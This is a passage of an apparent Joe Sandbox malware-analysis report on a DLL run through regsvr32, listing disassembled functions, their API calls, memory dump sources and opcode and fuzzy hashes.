                                                                                                                                • Associated: 00000002.00000002.243927498.00007FFFEFBA2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.243933800.00007FFFEFBA6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.243939312.00007FFFEFBA9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_7fffefb50000_regsvr32.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: AllocateBoundaryDeleteDescriptorHeap
                                                                                                                                • String ID: vb4vcW2kAW3Twaz?30
                                                                                                                                • API String ID: 254689257-4179232793
                                                                                                                                • Opcode ID: 08b1cf252e4ad689d9d92df66199491e9f35c83da394e0c34af369396f0aa75a
                                                                                                                                • Instruction ID: 6f1ab65e7d85fb5806362f55c97724e2e5623db430e97423817764091f5a6792
                                                                                                                                • Opcode Fuzzy Hash: 08b1cf252e4ad689d9d92df66199491e9f35c83da394e0c34af369396f0aa75a
                                                                                                                                • Instruction Fuzzy Hash: 2B210532A0CEC686E330CB14E4543AA77E9FB88754F504535CA8D877B9DF7DA5059B01
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 00007FFFEFB92FA0 Relevance: 4.5, APIs: 3, Instructions: 35memorythreadCOMMON
                                                                                                                                Download Yara Rule

                                                                                                                                Control-flow Graph

                                                                                                                                APIs
                                                                                                                                  • Part of subcall function 00007FFFEFB936F0: _initp_misc_winsig.LIBCMT ref: 00007FFFEFB93729
                                                                                                                                  • Part of subcall function 00007FFFEFB936F0: EncodePointer.KERNEL32(?,?,?,00007FFFEFB92FAB,?,?,?,00007FFFEFB92179), ref: 00007FFFEFB93745
                                                                                                                                • FlsAlloc.KERNEL32(?,?,?,00007FFFEFB92179), ref: 00007FFFEFB92FBB
                                                                                                                                  • Part of subcall function 00007FFFEFB93108: Sleep.KERNEL32(?,?,0000000A,00007FFFEFB92DA3,?,?,?,00007FFFEFB92DFF,?,?,?,00007FFFEFB9254F,?,?,?,00007FFFEFB9262A), ref: 00007FFFEFB9314D
                                                                                                                                • FlsSetValue.KERNEL32(?,?,?,00007FFFEFB92179), ref: 00007FFFEFB92FEC
                                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 00007FFFEFB93000
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.243882256.00007FFFEFB51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFFEFB50000, based on PE: true
                                                                                                                                • Associated: 00000002.00000002.243873952.00007FFFEFB50000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.243927498.00007FFFEFBA2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.243933800.00007FFFEFBA6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.243939312.00007FFFEFBA9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_7fffefb50000_regsvr32.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: _lock$AllocCurrentEncodePointerSleepThreadValue_initp_misc_winsig
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 54287522-0
                                                                                                                                • Opcode ID: 926dbc3dc0f4bcdbbdac5bfac17ca3eb5364a16ed8e4c5d99003da15ed9a218c
                                                                                                                                • Instruction ID: 631e1396b2a9a2058970042439293732054d17041d702bb57cbd525706eda3ea
                                                                                                                                • Opcode Fuzzy Hash: 926dbc3dc0f4bcdbbdac5bfac17ca3eb5364a16ed8e4c5d99003da15ed9a218c
                                                                                                                                • Instruction Fuzzy Hash: E8013160F09A0345FB64ABB9984537A72E95F45770F188234D53D862F2EF2CA495D223
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 0000000180001BDC Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 115processCOMMON
                                                                                                                                Download Yara Rule

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 618 180001bdc-180001cab call 1800142a0 621 180001d21-180001d64 CreateProcessW 618->621 622 180001cad-180001d1b call 18000dd70 618->622 622->621
                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.243754536.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID: CreateProcess
                                                                                                                                • String ID: :}
                                                                                                                                • API String ID: 963392458-2902022129
                                                                                                                                • Opcode ID: d4da30051582f0c34577a92f260795e531c0ce67ba31d10d3ee514360786ef98
                                                                                                                                • Instruction ID: 26ea99709d6fc87808755d2915912d2f892c3b8ed2aa040ac50dc8635ae9c2e3
                                                                                                                                • Opcode Fuzzy Hash: d4da30051582f0c34577a92f260795e531c0ce67ba31d10d3ee514360786ef98
                                                                                                                                • Instruction Fuzzy Hash: EB415A7091C7888FD7B4DF58D4857AABBE0FBC8314F108A1EE48DD7255DB7498458B82
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 00007FFFEFB92050 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.243882256.00007FFFEFB51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFFEFB50000, based on PE: true
                                                                                                                                • Associated: 00000002.00000002.243873952.00007FFFEFB50000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.243927498.00007FFFEFBA2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.243933800.00007FFFEFBA6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.243939312.00007FFFEFBA9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_7fffefb50000_regsvr32.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ExitProcess
                                                                                                                                • String ID: JKvDDasqwOPvGXZdqW
                                                                                                                                • API String ID: 621844428-4059861069
                                                                                                                                • Opcode ID: deed1fdb9085c7dcd35d809f3e44395f38d7cca76780fd27941661c68abd14ec
                                                                                                                                • Instruction ID: 3c00611eabfb7d1f25956a01fd535586cf3163ca6dfda2ab760e4765785ad161
                                                                                                                                • Opcode Fuzzy Hash: deed1fdb9085c7dcd35d809f3e44395f38d7cca76780fd27941661c68abd14ec
                                                                                                                                • Instruction Fuzzy Hash: 92D09221A18A8282DA20AB10E81535A73E5FB89368FC00230D58C4A6B9EF7CD25ACB05
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 00007FFFEFB96CEC Relevance: 3.1, APIs: 2, Instructions: 52memoryCOMMONLIBRARYCODE
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • _errno.LIBCMT ref: 00007FFFEFB96D0F
                                                                                                                                  • Part of subcall function 00007FFFEFB966D8: DecodePointer.KERNEL32 ref: 00007FFFEFB966FF
                                                                                                                                • RtlAllocateHeap.NTDLL(?,?,?,?,00000000,00007FFFEFB9313B,?,?,0000000A,00007FFFEFB92DA3,?,?,?,00007FFFEFB92DFF), ref: 00007FFFEFB96D58
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.243882256.00007FFFEFB51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFFEFB50000, based on PE: true
                                                                                                                                • Associated: 00000002.00000002.243873952.00007FFFEFB50000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.243927498.00007FFFEFBA2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.243933800.00007FFFEFBA6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.243939312.00007FFFEFBA9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_7fffefb50000_regsvr32.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: AllocateDecodeHeapPointer_errno
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 15861996-0
                                                                                                                                • Opcode ID: 39e9772f0cc65a7484b61a3e1fb2b868eaa6fa792f1398e078783a6d2fc3ba42
                                                                                                                                • Instruction ID: 740f7adf50f5e66c253b34a370015ba52cfd7ed0d2e04f0f01974993be61d929
                                                                                                                                • Opcode Fuzzy Hash: 39e9772f0cc65a7484b61a3e1fb2b868eaa6fa792f1398e078783a6d2fc3ba42
                                                                                                                                • Instruction Fuzzy Hash: 4D11CA22B0D24382FB154F25E60437972EBAF807F4F189A34CE2D06AF5EE6CA4008602
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 00007FFFEFB936F0 Relevance: 3.0, APIs: 2, Instructions: 26COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • _initp_misc_winsig.LIBCMT ref: 00007FFFEFB93729
                                                                                                                                  • Part of subcall function 00007FFFEFB9755C: EncodePointer.KERNEL32(?,?,?,?,00007FFFEFB9373E,?,?,?,00007FFFEFB92FAB,?,?,?,00007FFFEFB92179), ref: 00007FFFEFB97567
                                                                                                                                • EncodePointer.KERNEL32(?,?,?,00007FFFEFB92FAB,?,?,?,00007FFFEFB92179), ref: 00007FFFEFB93745
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.243882256.00007FFFEFB51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFFEFB50000, based on PE: true
                                                                                                                                • Associated: 00000002.00000002.243873952.00007FFFEFB50000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.243927498.00007FFFEFBA2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.243933800.00007FFFEFBA6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.243939312.00007FFFEFBA9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_7fffefb50000_regsvr32.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: EncodePointer$_initp_misc_winsig
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 190222155-0
                                                                                                                                • Opcode ID: 29817383cbd5b8fc12b900dc218af1d2c44829c2a488d6b4e34f3447ba8c1d75
                                                                                                                                • Instruction ID: 9dc6cf216b08ad9dfeff0dffc78667f95c2dbcc23c42fb9fa88643fa2cb1aeea
                                                                                                                                • Opcode Fuzzy Hash: 29817383cbd5b8fc12b900dc218af1d2c44829c2a488d6b4e34f3447ba8c1d75
                                                                                                                                • Instruction Fuzzy Hash: CAF0AE00E8C64740E918FB626C627BC32D44F96BA0FA82030E81F0A3F3DD2CE5558356
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 00007FFFEFB94110 Relevance: 3.0, APIs: 2, Instructions: 18memoryCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.243882256.00007FFFEFB51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFFEFB50000, based on PE: true
                                                                                                                                • Associated: 00000002.00000002.243873952.00007FFFEFB50000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.243927498.00007FFFEFBA2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.243933800.00007FFFEFBA6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.243939312.00007FFFEFBA9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_7fffefb50000_regsvr32.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Heap$CreateInformation
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1774340351-0
                                                                                                                                • Opcode ID: 489fa6aa26c4b222785c1fb3dc785f295b08bd9aa245ee8ef2e9349b67055af0
                                                                                                                                • Instruction ID: b5f070fd58bf0a35e878e8c2cc9297a99c049a59662fc621cc43586e6c313500
                                                                                                                                • Opcode Fuzzy Hash: 489fa6aa26c4b222785c1fb3dc785f295b08bd9aa245ee8ef2e9349b67055af0
                                                                                                                                • Instruction Fuzzy Hash: 7AE04FB5A29B9283EB999B21E8097657690FB88350F909039EA4D42BE4EF3CD0458A01
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 00007FFFEFB973F4 Relevance: 1.5, APIs: 1, Instructions: 15COMMONLIBRARYCODE
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • EncodePointer.KERNEL32(?,?,?,00007FFFEFB934AF,?,?,?,00007FFFEFB921CB), ref: 00007FFFEFB9740D
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.243882256.00007FFFEFB51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFFEFB50000, based on PE: true
                                                                                                                                • Associated: 00000002.00000002.243873952.00007FFFEFB50000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.243927498.00007FFFEFBA2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.243933800.00007FFFEFBA6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.243939312.00007FFFEFBA9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_7fffefb50000_regsvr32.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: EncodePointer
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2118026453-0
                                                                                                                                • Opcode ID: 0a2c1c774571843224449336236925bab63b88d9ce0b4f967ac09496dc1b8d3d
                                                                                                                                • Instruction ID: d5f06fe35be5ead8735e71bfa37f1386d92cc6221b020e6a033e281d03199fc6
                                                                                                                                • Opcode Fuzzy Hash: 0a2c1c774571843224449336236925bab63b88d9ce0b4f967ac09496dc1b8d3d
                                                                                                                                • Instruction Fuzzy Hash: 2FD05B32F5894291DB108B21F59136C33E4EB857A4F588031D65C077A5DD3CC456C701
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 00007FFFEFB93108 Relevance: 1.3, APIs: 1, Instructions: 36sleepCOMMONLIBRARYCODE
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • Sleep.KERNEL32(?,?,0000000A,00007FFFEFB92DA3,?,?,?,00007FFFEFB92DFF,?,?,?,00007FFFEFB9254F,?,?,?,00007FFFEFB9262A), ref: 00007FFFEFB9314D
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.243882256.00007FFFEFB51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFFEFB50000, based on PE: true
                                                                                                                                • Associated: 00000002.00000002.243873952.00007FFFEFB50000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.243927498.00007FFFEFBA2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.243933800.00007FFFEFBA6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.243939312.00007FFFEFBA9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_7fffefb50000_regsvr32.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Sleep_errno
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1068366078-0
                                                                                                                                • Opcode ID: 99b9e4cc6464749d47a71fc1b610823d805388b9272814145126b07a25ab941d
                                                                                                                                • Instruction ID: 3482618febb45ad4cdc27cb6af0a8281269af5fd1a1e101ecfb02587ad9ee68b
                                                                                                                                • Opcode Fuzzy Hash: 99b9e4cc6464749d47a71fc1b610823d805388b9272814145126b07a25ab941d
                                                                                                                                • Instruction Fuzzy Hash: 90018632B24B9286EA549B1A9840129B7E5FB88FE0F591131EE5D07BF1DF3CE891C705
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 00007FFFEFB9309C Relevance: 1.3, APIs: 1, Instructions: 30sleepCOMMONLIBRARYCODE
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                  • Part of subcall function 00007FFFEFB96C34: _FF_MSGBANNER.LIBCMT ref: 00007FFFEFB96C64
                                                                                                                                  • Part of subcall function 00007FFFEFB96C34: RtlAllocateHeap.NTDLL(?,?,00000000,00007FFFEFB930C0,?,?,00000000,00007FFFEFB96B19,?,?,00000000,00007FFFEFB96BC3), ref: 00007FFFEFB96C89
                                                                                                                                  • Part of subcall function 00007FFFEFB96C34: _errno.LIBCMT ref: 00007FFFEFB96CAD
                                                                                                                                  • Part of subcall function 00007FFFEFB96C34: _errno.LIBCMT ref: 00007FFFEFB96CB8
                                                                                                                                • Sleep.KERNEL32(?,?,00000000,00007FFFEFB96B19,?,?,00000000,00007FFFEFB96BC3,?,?,?,?,?,?,00000000,00007FFFEFB92DC8), ref: 00007FFFEFB930D2
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.243882256.00007FFFEFB51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFFEFB50000, based on PE: true
                                                                                                                                • Associated: 00000002.00000002.243873952.00007FFFEFB50000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.243927498.00007FFFEFBA2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.243933800.00007FFFEFBA6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.243939312.00007FFFEFBA9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_7fffefb50000_regsvr32.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: _errno$AllocateHeapSleep
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 4153772858-0
                                                                                                                                • Opcode ID: fda341601c3db2866e613cad0830f714017b4f3b234a5a25ccfa8741b4d7d732
                                                                                                                                • Instruction ID: dbe1d5348d9d673b465c3e7fdf024914b39055dd336ad76b497a77b96f4659cc
                                                                                                                                • Opcode Fuzzy Hash: fda341601c3db2866e613cad0830f714017b4f3b234a5a25ccfa8741b4d7d732
                                                                                                                                • Instruction Fuzzy Hash: F8F09C32B0DB8786EA549F15A44063D72E5FB84BA0F584134EA5D437F5DF3DE8918701
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Non-executed Functions

                                                                                                                                Function 00007FFFEFB9895C Relevance: 30.1, APIs: 16, Strings: 1, Instructions: 377COMMONLIBRARYCODE
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.243882256.00007FFFEFB51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFFEFB50000, based on PE: true
                                                                                                                                • Associated: 00000002.00000002.243873952.00007FFFEFB50000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.243927498.00007FFFEFBA2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.243933800.00007FFFEFBA6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.243939312.00007FFFEFBA9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_7fffefb50000_regsvr32.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: String$free$ByteCharMultiWide$ErrorLast
                                                                                                                                • String ID: Qr2_:g
                                                                                                                                • API String ID: 1446610345-1052752507
                                                                                                                                • Opcode ID: 1cb68e5ebb75471bd28e921dddda68db4bd0a605ea05e1978d1bd0bd9315b2d8
                                                                                                                                • Instruction ID: fdcfb7f4208eda50ea830850fc0520b43818f4b3ad40509242b38cbc76f499ab
                                                                                                                                • Opcode Fuzzy Hash: 1cb68e5ebb75471bd28e921dddda68db4bd0a605ea05e1978d1bd0bd9315b2d8
                                                                                                                                • Instruction Fuzzy Hash: 48F1B132A096838AE7608F25D4402A977F1FB44BB8F944635EA5D57BF8DF3CEA418701
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 00007FFFEFB97BE8 Relevance: 22.8, APIs: 11, Strings: 2, Instructions: 78libraryloaderCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.243882256.00007FFFEFB51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFFEFB50000, based on PE: true
                                                                                                                                • Associated: 00000002.00000002.243873952.00007FFFEFB50000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.243927498.00007FFFEFBA2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.243933800.00007FFFEFBA6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.243939312.00007FFFEFBA9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_7fffefb50000_regsvr32.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: DecodeErrorLastPointer_errno$AddressLibraryLoadProc
                                                                                                                                • String ID: ADVAPI32.DLL$SystemFunction036
                                                                                                                                • API String ID: 1558914745-1064046199
                                                                                                                                • Opcode ID: a4bc4b26b88413057c65bce35d9d543f8071dd4b5a3168f49804b7622c4c0c09
                                                                                                                                • Instruction ID: fa7bbfbdcbbc80da995b19b44784a56225918316802a3d28474dd2b0fa5c327d
                                                                                                                                • Opcode Fuzzy Hash: a4bc4b26b88413057c65bce35d9d543f8071dd4b5a3168f49804b7622c4c0c09
                                                                                                                                • Instruction Fuzzy Hash: A8317125F0DA4386FB10AB65A81577A73E1AF847A0FA44434EE0D47BF6EE3CE4058742
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 00007FFFEFB9C934 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 161COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.243882256.00007FFFEFB51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFFEFB50000, based on PE: true
                                                                                                                                • Associated: 00000002.00000002.243873952.00007FFFEFB50000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.243927498.00007FFFEFBA2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.243933800.00007FFFEFBA6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.243939312.00007FFFEFBA9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_7fffefb50000_regsvr32.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Locale$InfoValid$CodeDefaultPageUser_getptd_itow_s
                                                                                                                                • String ID: Norwegian-Nynorsk
                                                                                                                                • API String ID: 2273835618-461349085
                                                                                                                                • Opcode ID: 27b601e54d08442215230f85cfe0824a991ba4f10c2dcca786a022abe7f281d3
                                                                                                                                • Instruction ID: f84a4a36b4c5a5f8c2c5fe5195cd45aa59c3e016edcbf915dcc918db0e24f189
                                                                                                                                • Opcode Fuzzy Hash: 27b601e54d08442215230f85cfe0824a991ba4f10c2dcca786a022abe7f281d3
                                                                                                                                • Instruction Fuzzy Hash: 186175A6A0878386FB659F21E4003B937E0EF45BA4F588136CA4D466F9DF3CE940C316
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 00007FFFEFB920E0 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 67COMMONLIBRARYCODE
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.243882256.00007FFFEFB51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFFEFB50000, based on PE: true
                                                                                                                                • Associated: 00000002.00000002.243873952.00007FFFEFB50000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.243927498.00007FFFEFBA2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.243933800.00007FFFEFBA6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.243939312.00007FFFEFBA9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_7fffefb50000_regsvr32.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ExceptionFilterProcessUnhandled$CaptureContextCurrentDebuggerEntryFunctionLookupPresentTerminateUnwindVirtual
                                                                                                                                • String ID: Qr2_:g
                                                                                                                                • API String ID: 3778485334-1052752507
                                                                                                                                • Opcode ID: 44244c45948aa76910f1429c67e23cf948153936c8457040e3babb9890c0c3d8
                                                                                                                                • Instruction ID: c0f4f600fb04493670b60ef02d022ab5206966afb437cf133d0d960809756e29
                                                                                                                                • Opcode Fuzzy Hash: 44244c45948aa76910f1429c67e23cf948153936c8457040e3babb9890c0c3d8
                                                                                                                                • Instruction Fuzzy Hash: 7E31C335A0CF4385EA609B50F8503AA73E4FB84764F904036DA8D427B5EF7CE499C702
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 00007FFFEFB9B5CC Relevance: 14.4, APIs: 5, Strings: 3, Instructions: 407timeCOMMONLIBRARYCODE
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.243882256.00007FFFEFB51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFFEFB50000, based on PE: true
                                                                                                                                • Associated: 00000002.00000002.243873952.00007FFFEFB50000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.243927498.00007FFFEFBA2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.243933800.00007FFFEFBA6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.243939312.00007FFFEFBA9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_7fffefb50000_regsvr32.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: FormatTime$__ascii_stricmpfree
                                                                                                                                • String ID: Qr2_:g$a/p$am/pm
                                                                                                                                • API String ID: 2252689280-3632104271
                                                                                                                                • Opcode ID: f0a1e010cfc2bba628f50de28a03b415369789bd89755694daa0cdadb7c0128b
                                                                                                                                • Instruction ID: ec5a0699064caae3f0ac634ed8e06a03c23272526044e43203ae73d6f3c48ef2
                                                                                                                                • Opcode Fuzzy Hash: f0a1e010cfc2bba628f50de28a03b415369789bd89755694daa0cdadb7c0128b
                                                                                                                                • Instruction Fuzzy Hash: 27F1CC26A1C69385E7748F2484943BC7BE1FB057A4F48D136EA9D47AF5DE3CAA44C302
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 00007FFFEFB9DF98 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 136COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • GetLocaleInfoW.KERNEL32(?,?,?,?,?,?,?,?,?,00007FFFEFB9E1C2), ref: 00007FFFEFB9DFF2
                                                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,00007FFFEFB9E1C2), ref: 00007FFFEFB9E004
                                                                                                                                • GetLocaleInfoW.KERNEL32(?,?,?,?,?,?,?,?,?,00007FFFEFB9E1C2), ref: 00007FFFEFB9E04F
